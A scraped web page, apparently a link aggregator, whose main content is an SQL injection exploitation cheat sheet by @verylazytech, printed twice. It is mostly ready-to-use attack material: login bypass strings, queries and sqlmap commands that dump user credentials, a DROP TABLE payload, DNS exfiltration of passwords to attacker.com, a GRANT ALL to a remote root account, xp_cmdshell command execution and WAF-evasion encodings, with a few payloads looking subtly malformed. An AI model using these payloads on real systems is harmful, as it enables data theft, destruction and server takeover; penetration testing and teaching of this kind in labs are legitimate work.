![[The AI Show Episode 142]: ChatGPT’s New Image Generator, Studio Ghibli Craze and Backlash, Gemini 2.5, OpenAI Academy, 4o Updates, Vibe Marketing & xAI Acquires X](https://www.marketingaiinstitute.com/hubfs/ep%20142%20cover.png)
![[DEALS] The Premium Learn to Code Certification Bundle (97% off) & Other Deals Up To 98% Off – Offers End Soon!](https://www.javacodegeeks.com/wp-content/uploads/2012/12/jcg-logo.jpg){kind=logo}
![From drop-out to software architect with Jason Lengstorf [Podcast #167]](https://cdn.hashnode.com/res/hashnode/image/upload/v1743796461357/f3d19cd7-e6f5-4d7c-8bfc-eb974bc8da68.png?#)
.png?#)
_Christophe_Coat_Alamy.jpg?#)
 (1).webp?#)
![Apple Considers Delaying Smart Home Hub Until 2026 [Gurman]](https://www.iclarified.com/images/news/96946/96946/96946-640.jpg)
![iPhone 17 Pro Won't Feature Two-Toned Back [Gurman]](https://www.iclarified.com/images/news/96944/96944/96944-640.jpg)
![Tariffs Threaten Apple's $999 iPhone Price Point in the U.S. [Gurman]](https://www.iclarified.com/images/news/96943/96943/96943-640.jpg)
Practical SQL Injection Exploitation Cheat Sheet - @verylazytech
Introduction SQL Injection (SQLi) remains one of the most dangerous vulnerabilities in web applications, allowing attackers to manipulate databases, extract sensitive data, and even gain remote access. This cheat sheet focuses on real-world SQLi exploitation with hands-on examples, bypassing security filters, and using tools like Burp Suite and SQLMap. Setting Up a Testing Environment Before executing SQL injection attacks, set up a safe environment: Damn Vulnerable Web App (DVWA) — Download Here bWAPP (Buggy Web Application) — Download Here HackTheBox or TryHackMe Labs Ensure you have: Burp Suite (for manual exploitation) SQLMap (for automated attacks) A vulnerable web application to practice sql injection — @verylazytech Step 1: Identifying SQL Injection Vulnerability Manual Testing with Basic Payloads In a login form, test with: admin' OR '1'='1' -- If you get access without a correct password, it’s vulnerable. Check for errors using: ' OR 1=1 -- " OR 1=1 -- ' OR 'a'='a' -- If an error occurs (e.g., syntax error or unclosed quotation), the input field is vulnerable. Using Burp Suite to Intercept Requests Enable Burp Suite Proxy and intercept a login request. Modify the username field to admin'--. If authentication succeeds, SQLi is present. Step 2: Extracting Database Information Once confirmed vulnerable, extract database info using: Determining Database Type SELECT @@version; -- MySQL SELECT version(); -- PostgreSQL SELECT banner FROM v$version; -- Oracle Enumerating Tables and Columns SELECT table_name FROM information_schema.tables; SELECT column_name FROM information_schema.columns WHERE table_name = 'users'; Extracting User Credentials SELECT username, password FROM users; Step 3: Automated Exploitation with SQLMap SQLMap can automate SQL injection with simple commands. Basic SQL Injection Scan sqlmap -u "http://target.com/login.php?id=1" --dbs Dumping User Credentials sqlmap -u "http://target.com/login.php?id=1" -D database_name -T users --dump Bypassing WAFs with Randomized Case Encoding sqlmap -u "http://target.com/login.php?id=1" --tamper=between,randomcase Step 4: Blind SQL Injection Exploitation If no errors or output is displayed, blind SQLi can be used. Time-Based Blind SQLi ' OR IF(1=1, SLEEP(5), 0) -- If the response is delayed, SQLi is confirmed. Boolean-Based Blind SQLi ' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END) -- If successful, the server responds differently based on the condition. Step 5: Exploiting Advanced SQL Injection Techniques Stacked Queries (Executing Multiple Statements) admin'; DROP TABLE users; -- (Only works if multiple queries are allowed.) Extracting Data via DNS Exfiltration SELECT load_file(concat('\', (SELECT password FROM users LIMIT 1), '.attacker.com\file')); (Useful when output is blocked.) Privilege Escalation & OS Command Execution MySQL User Escalation SELECT user, host FROM mysql.user; GRANT ALL PRIVILEGES ON . TO 'root'@'%' IDENTIFIED BY 'hacked'; Executing System Commands in MSSQL EXEC xp_cmdshell 'whoami'; (Useful for Remote Code Execution.) Step 6: Bypassing Security Filters & WAFs Most web applications use WAFs (Web Application Firewalls) to detect SQLi. Here’s how to bypass them: Encoding Payloads (Hex, Base64, URL Encoding) SELECT username FROM users WHERE id=0x61646D696E; -- HEX encoding SELECT username FROM users WHERE id=BASE64_DECODE('YWRtaW4='); Using Comment Injection to Obfuscate Payloads SELECT//username//FROM//users//WHERE//id//=1; Randomized Case & White Space Manipulation SeLeCt UsErNaMe FrOm UsErS WhErE iD=1; Conclusion SQL Injection remains a high-impact vulnerability, but with proper understanding and hands-on practice, penetration testers can identify and exploit it effectively. This cheat sheet provided: Step-by-step exploitation techniques Real-world SQLi payloads WAF bypassing strategies Examples from actual security breaches
Introduction
SQL Injection (SQLi) remains one of the most dangerous vulnerabilities in web applications, allowing attackers to manipulate databases, extract sensitive data, and even gain remote access. This cheat sheet focuses on real-world SQLi exploitation with hands-on examples, bypassing security filters, and using tools like Burp Suite and SQLMap.
Setting Up a Testing Environment
Before executing SQL injection attacks, set up a safe environment:
Damn Vulnerable Web App (DVWA) — Download Here
bWAPP (Buggy Web Application) — Download Here
HackTheBox or TryHackMe Labs
Ensure you have:
Burp Suite (for manual exploitation)
SQLMap (for automated attacks)
A vulnerable web application to practice
sql injection — @verylazytech
Step 1: Identifying SQL Injection Vulnerability
Manual Testing with Basic Payloads
In a login form, test with:
admin' OR '1'='1' --
If you get access without a correct password, it’s vulnerable.
Check for errors using:
' OR 1=1 --
" OR 1=1 --
' OR 'a'='a' --
If an error occurs (e.g., syntax error or unclosed quotation), the input field is vulnerable.
Using Burp Suite to Intercept Requests
Enable Burp Suite Proxy and intercept a login request.
Modify the username field to admin'--.
If authentication succeeds, SQLi is present.
Step 2: Extracting Database Information
Once confirmed vulnerable, extract database info using:
Determining Database Type
SELECT @@version; -- MySQL
SELECT version(); -- PostgreSQL
SELECT banner FROM v$version; -- Oracle
Enumerating Tables and Columns
SELECT table_name FROM information_schema.tables;
SELECT column_name FROM information_schema.columns WHERE table_name = 'users';
Extracting User Credentials
SELECT username, password FROM users;
Step 3: Automated Exploitation with SQLMap
SQLMap can automate SQL injection with simple commands.
Basic SQL Injection Scan
sqlmap -u "http://target.com/login.php?id=1" --dbs
Dumping User Credentials
sqlmap -u "http://target.com/login.php?id=1" -D database_name -T users --dump
Bypassing WAFs with Randomized Case Encoding
sqlmap -u "http://target.com/login.php?id=1" --tamper=between,randomcase
Step 4: Blind SQL Injection Exploitation
If no errors or output is displayed, blind SQLi can be used.
Time-Based Blind SQLi
' OR IF(1=1, SLEEP(5), 0) --
If the response is delayed, SQLi is confirmed.
Boolean-Based Blind SQLi
' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END) --
If successful, the server responds differently based on the condition.
Step 5: Exploiting Advanced SQL Injection Techniques
Stacked Queries (Executing Multiple Statements)
admin'; DROP TABLE users; --
(Only works if multiple queries are allowed.)
Extracting Data via DNS Exfiltration
SELECT load_file(concat('\', (SELECT password FROM users LIMIT 1), '.attacker.com\file'));
(Useful when output is blocked.)
Privilege Escalation & OS Command Execution
MySQL User Escalation
SELECT user, host FROM mysql.user;
GRANT ALL PRIVILEGES ON . TO 'root'@'%' IDENTIFIED BY 'hacked';
Executing System Commands in MSSQL
EXEC xp_cmdshell 'whoami';
(Useful for Remote Code Execution.)
Step 6: Bypassing Security Filters & WAFs
Most web applications use WAFs (Web Application Firewalls) to detect SQLi. Here’s how to bypass them:
Encoding Payloads (Hex, Base64, URL Encoding)
SELECT username FROM users WHERE id=0x61646D696E; -- HEX encoding
SELECT username FROM users WHERE id=BASE64_DECODE('YWRtaW4=');
Using Comment Injection to Obfuscate Payloads
SELECT//username//FROM//users//WHERE//id//=1;
Randomized Case & White Space Manipulation
SeLeCt UsErNaMe FrOm UsErS WhErE iD=1;
Conclusion
SQL Injection remains a high-impact vulnerability, but with proper understanding and hands-on practice, penetration testers can identify and exploit it effectively. This cheat sheet provided:
Step-by-step exploitation techniques
Real-world SQLi payloads
WAF bypassing strategies
Examples from actual security breaches
